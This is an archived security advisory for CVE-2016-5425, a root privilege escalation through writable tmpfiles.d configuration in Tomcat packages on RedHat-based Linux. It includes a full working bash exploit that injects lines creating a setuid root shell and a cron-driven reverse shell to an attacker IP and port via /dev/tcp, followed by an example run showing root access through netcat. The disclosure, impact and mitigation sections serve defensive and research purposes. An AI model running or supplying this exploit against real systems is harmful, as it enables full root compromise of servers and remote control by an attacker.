what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Tomcat 8 / 7 / 6 Privilege Escalation

Apache Tomcat 8 / 7 / 6 Privilege Escalation
Posted Oct 10, 2016
Authored by Dawid Golunski

Apache Tomcat versions 8, 7, and 6 suffer from a privilege escalation vulnerability on RedHat-based distros.

tags | exploit
systems | linux, redhat
advisories | CVE-2016-5425
SHA-256 | 12ec6d054904816f7a7adc452b470c239ac9e45d1cbea47b206cc70413667d52

Apache Tomcat 8 / 7 / 6 Privilege Escalation

Change Mirror Download
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com

- CVE-2016-5425
- Release date: 10.10.2016
- Revision: 1
- Severity: High
=============================================


I. VULNERABILITY
-------------------------

Apache Tomcat (packaging on RedHat-based distros) - Root Privilege Escalation


II. BACKGROUND
-------------------------

"The Apache TomcatAaAA(r) software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.

The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.

Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.
"

http://tomcat.apache.org/


III. INTRODUCTION
-------------------------

Apache Tomcat packages provided by default repositories of RedHat-based
distributions (including CentOS, RedHat, OracleLinux, Fedora, etc.)
create a tmpfiles.d configuration file with insecure permissions which
allow attackers who are able to write files with tomcat user permissions
(for example, through a vulnerability in web application hosted on Tomcat)
to escalate their privileges from tomcat user to root and fully compromise
the target system.


IV. DESCRIPTION
-------------------------

The vulnerability stems from the tomcat.conf file installed by default
by packages on RedHat-based systems with write permissions for the tomcat
group:

[root@centos7 ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 361 Oct 9 23:58 /usr/lib/tmpfiles.d/tomcat.conf

The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage
temporary files including their creation.

Attackers could very easily exploit the weak permissions on tomcat.conf to
inject configuration that creates a rootshell or remote reverse shell that
allows them to execute arbitrary commands with root privileges.

Injected malicious settings would be processed whenever
/usr/bin/systemd-tmpfiles gets executed.

systemd-tmpfiles is executed by default on boot on RedHat-based systems
through systemd-tmpfiles-setup.service service as can be seen below:


---[ /usr/lib/systemd/system/systemd-tmpfiles-setup.service ]---

[...]
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev

----------------------------------------------------------------

Depending on the system in use, the execution of systemd-tmpfiles could also
be triggered by other services, cronjobs, startup scripts etc.


The vulnerability could potentially get exploited by remote attackers in
combination with a vulnerable web application hosted on Tomcat if they
managed to find a path traversal (e.g in a file upload feature) or an arbitrary
file write/append vulnerability. This would allow them to append settings
to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root
privileges without a prior local access/shell on the system.
This vector could prove useful to attackers, for example if they were unable to
obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a
vulnerable file upload feature due to restrictions imposed by Tomcat security
manager, or a read-only webroot etc.

It is worth to note that systemd-tmpfiles does not stop on syntax errors when
processing configuration files which makes exploitation easier as attackers only
need to inject their payload after a new line and do not need to worry
about garbage data potentially prepended by a vulnerable webapp in case of
Arbitrary File Write/Append exploitation.



V. PROOF OF CONCEPT EXPLOIT
-------------------------

-----------[ tomcat-RH-root.sh ]---------

#!/bin/bash
# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit
# CVE-2016-5425
#
# Full advisory at:
# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
#
# Discovered and coded by:
# Dawid Golunski
# http://legalhackers.com
#
# Tested on RedHat, CentOS, OracleLinux, Fedora systems.
#
# For testing purposes only.
#

ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090

echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e " Discovered by Dawid Golunski\n"
echo "[+] Checking vulnerability"
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat'
if [ $? -ne 0 ]; then
echo "Not vulnerable or tomcat installed under a different user than 'tomcat'"
exit 1
fi
echo -e "\n[+] Your system is vulnerable!"

echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..."
cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.conf
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
_eof_

echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf
echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n"


--------------[ eof ]--------------------


Example run:

-bash-4.2$ rpm -qa | grep -i tomcat
tomcat-7.0.54-2.el7_1.noarch

-bash-4.2$ cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)

-bash-4.2$ id
uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

-bash-4.2$ ./tomcat-RH-root.sh

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
Discovered by Dawid Golunski

[+] Checking vulnerability
-rw-rw-r--. 1 root tomcat 43 Oct 10 02:39 /usr/lib/tmpfiles.d/tomcat.conf

[+] Your system is vulnerable!

[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf...
[+] /usr/lib/tmpfiles.d/tomcat.conf contains:
f /var/run/tomcat.pid 0644 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n"

[+] Payload injected! Wait for your root shell...

Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090

-bash-4.2$ nc -l -p 9090
bash: no job control in this shell
[root@centos7 ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023

[root@centos7 ~]# ls -l /usr/share/tomcat/rootsh
ls -l /usr/share/tomcat/rootsh
-rwsrwx---. 1 root root 960392 Aug 2 12:00 /usr/share/tomcat/rootsh
[root@centos7 ~]#



VI. BUSINESS IMPACT
-------------------------

Attackers who have gained access to tomcat user account or the ability to
write files as tomcat user could escalate their privileges to root and fully
compromise the affected system.

As explained in section IV., the vulnerability could potentially get exploited
by remote attackers in combination with certain web application vulnerabilities
to achieve command execution without prior shell access.


VII. SYSTEMS AFFECTED
-------------------------

Multiple versions of Tomcat packages on RedHat-based systems are affected.

The vulnerability was confirmed on Tomcat installed from default repositories
on the following systems:

- CentOS
- Fedora
- Oracle Linux
- RedHat

Refer to information provided by your distribution to obtain an exact list
of vulnerable packages.


Detailes provided by RedHat can be found at:

https://access.redhat.com/security/cve/CVE-2016-5425


VIII. SOLUTION
-------------------------

Adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file to remove write
permission for the tomcat group.

Alternatively, update to the latest packages provided by your distribution.
Confirm the file permissions after the update.


IX. REFERENCES
-------------------------

http://legalhackers.com

http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html

The source code of the exploit (tomcat-RH-root.sh) can be downloaded from:
http://legalhackers.com/exploits/tomcat-RH-root.sh

CVE-2016-5425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425

https://access.redhat.com/security/cve/CVE-2016-5425


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com

XI. REVISION HISTORY
-------------------------

10.10.2016 - Advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close